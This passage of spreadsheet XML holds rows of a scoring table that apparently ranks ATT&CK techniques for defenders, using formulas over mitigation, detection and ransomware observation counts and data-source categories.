      <c r="J101" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K101" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L101" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M101" s="37">
        <v>0</v>
      </c>
      <c r="N101" s="56">
        <v>0</v>
      </c>
      <c r="O101" s="56">
        <v>0</v>
      </c>
      <c r="P101" s="56">
        <v>0</v>
      </c>
      <c r="Q101" s="56">
        <v>0</v>
      </c>
      <c r="R101" s="57" t="s">
        <v>375</v>
      </c>
      <c r="S101" s="57">
        <v>3</v>
      </c>
      <c r="T101" s="57" t="s">
        <v>376</v>
      </c>
      <c r="U101" s="57">
        <v>6</v>
      </c>
      <c r="V101" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>8.5714095238095242E-2</v>
      </c>
      <c r="W101" s="37">
        <v>9</v>
      </c>
      <c r="X101" s="37">
        <v>0.163636</v>
      </c>
      <c r="Y101" s="37">
        <v>0.163636</v>
      </c>
      <c r="Z101" s="37">
        <v>0</v>
      </c>
      <c r="AA101" s="37">
        <v>0</v>
      </c>
      <c r="AB101" s="37">
        <v>0</v>
      </c>
      <c r="AC101" s="37"/>
      <c r="AD101" s="50" t="s">
        <v>380</v>
      </c>
      <c r="AE101" s="37" t="str" cm="1">
        <f t="array" ref="AE101">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD101)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF101" s="37">
        <v>97</v>
      </c>
      <c r="AG101" s="37" t="str" cm="1">
        <f t="array" ref="AG101">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD101)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH101" s="37">
        <v>97</v>
      </c>
      <c r="AI101" s="37" t="str" cm="1">
        <f t="array" ref="AI101">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD101)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ101" s="37">
        <v>97</v>
      </c>
      <c r="AK101" s="37" t="str" cm="1">
        <f t="array" ref="AK101">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD101)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL101" s="37">
        <v>97</v>
      </c>
      <c r="AM101" s="37" t="str" cm="1">
        <f t="array" ref="AM101">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD101)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN101" s="37">
        <v>0</v>
      </c>
      <c r="AO101" s="37">
        <v>0</v>
      </c>
      <c r="AP101" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ101" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>24.080927682539681</v>
      </c>
      <c r="AR101" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS101" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT101" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU10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02" spans="1:47" ht="34">
      <c r="A102" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B102" s="37">
        <f t="shared" si="1"/>
        <v>72.985639428571432</v>
      </c>
      <c r="C102" s="37" t="s">
        <v>385</v>
      </c>
      <c r="D102" s="50" t="s">
        <v>369</v>
      </c>
      <c r="E102" s="37" t="s">
        <v>386</v>
      </c>
      <c r="F102" s="37">
        <v>1</v>
      </c>
      <c r="G102" s="37">
        <v>1</v>
      </c>
      <c r="H102" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I102" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J102" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K102" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L102" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M102" s="37">
        <v>0</v>
      </c>
      <c r="N102" s="56">
        <v>0</v>
      </c>
      <c r="O102" s="56">
        <v>0</v>
      </c>
      <c r="P102" s="56">
        <v>0</v>
      </c>
      <c r="Q102" s="56">
        <v>0</v>
      </c>
      <c r="R102" s="57" t="s">
        <v>375</v>
      </c>
      <c r="S102" s="57">
        <v>3</v>
      </c>
      <c r="T102" s="57" t="s">
        <v>376</v>
      </c>
      <c r="U102" s="57">
        <v>6</v>
      </c>
      <c r="V102" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>8.5714095238095242E-2</v>
      </c>
      <c r="W102" s="37">
        <v>9</v>
      </c>
      <c r="X102" s="37">
        <v>0.163636</v>
      </c>
      <c r="Y102" s="37">
        <v>0.163636</v>
      </c>
      <c r="Z102" s="37">
        <v>0</v>
      </c>
      <c r="AA102" s="37">
        <v>0</v>
      </c>
      <c r="AB102" s="37">
        <v>0</v>
      </c>
      <c r="AC102" s="37"/>
      <c r="AD102" s="50" t="s">
        <v>380</v>
      </c>
      <c r="AE102" s="37" t="str" cm="1">
        <f t="array" ref="AE102">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD102)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF102" s="37">
        <v>98</v>
      </c>
      <c r="AG102" s="37" t="str" cm="1">
        <f t="array" ref="AG102">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD102)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH102" s="37">
        <v>98</v>
      </c>
      <c r="AI102" s="37" t="str" cm="1">
        <f t="array" ref="AI102">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD102)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ102" s="37">
        <v>98</v>
      </c>
      <c r="AK102" s="37" t="str" cm="1">
        <f t="array" ref="AK102">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD102)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL102" s="37">
        <v>98</v>
      </c>
      <c r="AM102" s="37" t="str" cm="1">
        <f t="array" ref="AM102">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD102)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN102" s="37">
        <v>0</v>
      </c>
      <c r="AO102" s="37">
        <v>1</v>
      </c>
      <c r="AP102" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ102" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>24.328546476190478</v>
      </c>
      <c r="AR102" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS102" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT102" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU10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0.60306063038548752</v>
      </c>
    </row>
    <row r="103" spans="1:47" ht="34">
      <c r="A103" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B103" s="37">
        <f t="shared" si="1"/>
        <v>119.09996219047619</v>
      </c>
      <c r="C103" s="37" t="s">
        <v>387</v>
      </c>
      <c r="D103" s="50" t="s">
        <v>369</v>
      </c>
      <c r="E103" s="37" t="s">
        <v>388</v>
      </c>
      <c r="F103" s="37">
        <v>1</v>
      </c>
      <c r="G103" s="37">
        <v>1</v>
      </c>
      <c r="H103" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I103" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J103" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K103" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L103" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M103" s="37">
        <v>0</v>
      </c>
      <c r="N103" s="56">
        <v>0</v>
      </c>
      <c r="O103" s="56">
        <v>0</v>
      </c>
      <c r="P103" s="56">
        <v>0</v>
      </c>
      <c r="Q103" s="56">
        <v>0</v>
      </c>
      <c r="R103" s="57" t="s">
        <v>370</v>
      </c>
      <c r="S103" s="57">
        <v>9</v>
      </c>
      <c r="T103" s="57" t="s">
        <v>371</v>
      </c>
      <c r="U103" s="57">
        <v>12</v>
      </c>
      <c r="V103" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.19999990476190477</v>
      </c>
      <c r="W103" s="37">
        <v>21</v>
      </c>
      <c r="X103" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Y103" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Z103" s="37">
        <v>0</v>
      </c>
      <c r="AA103" s="37">
        <v>0</v>
      </c>
      <c r="AB103" s="37">
        <v>0</v>
      </c>
      <c r="AC103" s="37"/>
      <c r="AD103" s="50" t="s">
        <v>380</v>
      </c>
      <c r="AE103" s="37" t="str" cm="1">
        <f t="array" ref="AE103">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD103)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF103" s="37">
        <v>99</v>
      </c>
      <c r="AG103" s="37" t="str" cm="1">
        <f t="array" ref="AG103">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD103)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH103" s="37">
        <v>99</v>
      </c>
      <c r="AI103" s="37" t="str" cm="1">
        <f t="array" ref="AI103">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD103)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ103" s="37">
        <v>99</v>
      </c>
      <c r="AK103" s="37" t="str" cm="1">
        <f t="array" ref="AK103">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD103)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL103" s="37">
        <v>99</v>
      </c>
      <c r="AM103" s="37" t="str" cm="1">
        <f t="array" ref="AM103">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD103)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN103" s="37">
        <v>0</v>
      </c>
      <c r="AO103" s="37">
        <v>0</v>
      </c>
      <c r="AP103" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ103" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>39.699987396825399</v>
      </c>
      <c r="AR103" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS103" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT103" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU10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04" spans="1:47" ht="17">
      <c r="A104" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B104" s="37">
        <f t="shared" si="1"/>
        <v>101.20474280952382</v>
      </c>
      <c r="C104" s="37" t="s">
        <v>389</v>
      </c>
      <c r="D104" s="50" t="s">
        <v>369</v>
      </c>
      <c r="E104" s="37" t="s">
        <v>390</v>
      </c>
      <c r="F104" s="37">
        <v>1</v>
      </c>
      <c r="G104" s="37">
        <v>1</v>
      </c>
      <c r="H104" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I104" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J104" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K104" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L104" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M104" s="37">
        <v>0</v>
      </c>
      <c r="N104" s="56">
        <v>0</v>
      </c>
      <c r="O104" s="56">
        <v>0</v>
      </c>
      <c r="P104" s="56">
        <v>0</v>
      </c>
      <c r="Q104" s="56">
        <v>0</v>
      </c>
      <c r="R104" s="57" t="s">
        <v>391</v>
      </c>
      <c r="S104" s="57">
        <v>7</v>
      </c>
      <c r="T104" s="57" t="s">
        <v>392</v>
      </c>
      <c r="U104" s="57">
        <v>9</v>
      </c>
      <c r="V104" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.15238090476190475</v>
      </c>
      <c r="W104" s="37">
        <v>16</v>
      </c>
      <c r="X104" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Y104" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Z104" s="37">
        <v>0</v>
      </c>
      <c r="AA104" s="37">
        <v>0</v>
      </c>
      <c r="AB104" s="37">
        <v>0</v>
      </c>
      <c r="AC104" s="37"/>
      <c r="AD104" s="50" t="s">
        <v>393</v>
      </c>
      <c r="AE104" s="37" t="str" cm="1">
        <f t="array" ref="AE104">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD104)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF104" s="37">
        <v>100</v>
      </c>
      <c r="AG104" s="37" t="str" cm="1">
        <f t="array" ref="AG104">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD104)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH104" s="37">
        <v>100</v>
      </c>
      <c r="AI104" s="37" t="str" cm="1">
        <f t="array" ref="AI104">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD104)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ104" s="37">
        <v>100</v>
      </c>
      <c r="AK104" s="37" t="str" cm="1">
        <f t="array" ref="AK104">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD104)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL104" s="37">
        <v>100</v>
      </c>
      <c r="AM104" s="37" t="str" cm="1">
        <f t="array" ref="AM104">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD104)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN104" s="37">
        <v>0</v>
      </c>
      <c r="AO104" s="37">
        <v>1</v>
      </c>
      <c r="AP104" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ104" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>33.734914269841276</v>
      </c>
      <c r="AR104" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS104" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT104" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU10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0.8270217683295541</v>
      </c>
    </row>
    <row r="105" spans="1:47" ht="17">
      <c r="A105" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B105" s="37">
        <f t="shared" si="1"/>
        <v>75.214208571428571</v>
      </c>
      <c r="C105" s="37" t="s">
        <v>394</v>
      </c>
      <c r="D105" s="50" t="s">
        <v>369</v>
      </c>
      <c r="E105" s="37" t="s">
        <v>395</v>
      </c>
      <c r="F105" s="37">
        <v>1</v>
      </c>
      <c r="G105" s="37">
        <v>1</v>
      </c>
      <c r="H105" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I105" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J105" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K105" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L105" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M105" s="37">
        <v>0</v>
      </c>
      <c r="N105" s="56">
        <v>0</v>
      </c>
      <c r="O105" s="56">
        <v>0</v>
      </c>
      <c r="P105" s="56">
        <v>0</v>
      </c>
      <c r="Q105" s="56">
        <v>0</v>
      </c>
      <c r="R105" s="57" t="s">
        <v>375</v>
      </c>
      <c r="S105" s="57">
        <v>3</v>
      </c>
      <c r="T105" s="57" t="s">
        <v>376</v>
      </c>
      <c r="U105" s="57">
        <v>6</v>
      </c>
      <c r="V105" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>8.5714095238095242E-2</v>
      </c>
      <c r="W105" s="37">
        <v>9</v>
      </c>
      <c r="X105" s="37">
        <v>0.163636</v>
      </c>
      <c r="Y105" s="37">
        <v>0.163636</v>
      </c>
      <c r="Z105" s="37">
        <v>0</v>
      </c>
      <c r="AA105" s="37">
        <v>0</v>
      </c>
      <c r="AB105" s="37">
        <v>0</v>
      </c>
      <c r="AC105" s="37"/>
      <c r="AD105" s="50" t="s">
        <v>396</v>
      </c>
      <c r="AE105" s="37" t="str" cm="1">
        <f t="array" ref="AE105">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD105)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF105" s="37">
        <v>101</v>
      </c>
      <c r="AG105" s="37" t="str" cm="1">
        <f t="array" ref="AG105">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD105)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH105" s="37">
        <v>101</v>
      </c>
      <c r="AI105" s="37" t="str" cm="1">
        <f t="array" ref="AI105">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD105)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ105" s="37">
        <v>101</v>
      </c>
      <c r="AK105" s="37" t="str" cm="1">
        <f t="array" ref="AK105">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD105)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL105" s="37">
        <v>101</v>
      </c>
      <c r="AM105" s="37" t="str" cm="1">
        <f t="array" ref="AM105">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD105)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN105" s="37">
        <v>0</v>
      </c>
      <c r="AO105" s="37">
        <v>1</v>
      </c>
      <c r="AP105" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ105" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>25.071402857142857</v>
      </c>
      <c r="AR105" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS105" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT105" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU10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0.62074768707482986</v>
      </c>
    </row>
    <row r="106" spans="1:47" ht="34">
      <c r="A106" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B106" s="37">
        <f t="shared" si="1"/>
        <v>85.695160190476201</v>
      </c>
      <c r="C106" s="37" t="s">
        <v>397</v>
      </c>
      <c r="D106" s="50" t="s">
        <v>369</v>
      </c>
      <c r="E106" s="37" t="s">
        <v>398</v>
      </c>
      <c r="F106" s="37">
        <v>1</v>
      </c>
      <c r="G106" s="37">
        <v>1</v>
      </c>
      <c r="H106" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I106" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J106" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K106" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L106" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M106" s="37">
        <v>0</v>
      </c>
      <c r="N106" s="56">
        <v>1</v>
      </c>
      <c r="O106" s="56">
        <v>2</v>
      </c>
      <c r="P106" s="56">
        <v>2</v>
      </c>
      <c r="Q106" s="56">
        <v>0</v>
      </c>
      <c r="R106" s="57" t="s">
        <v>375</v>
      </c>
      <c r="S106" s="57">
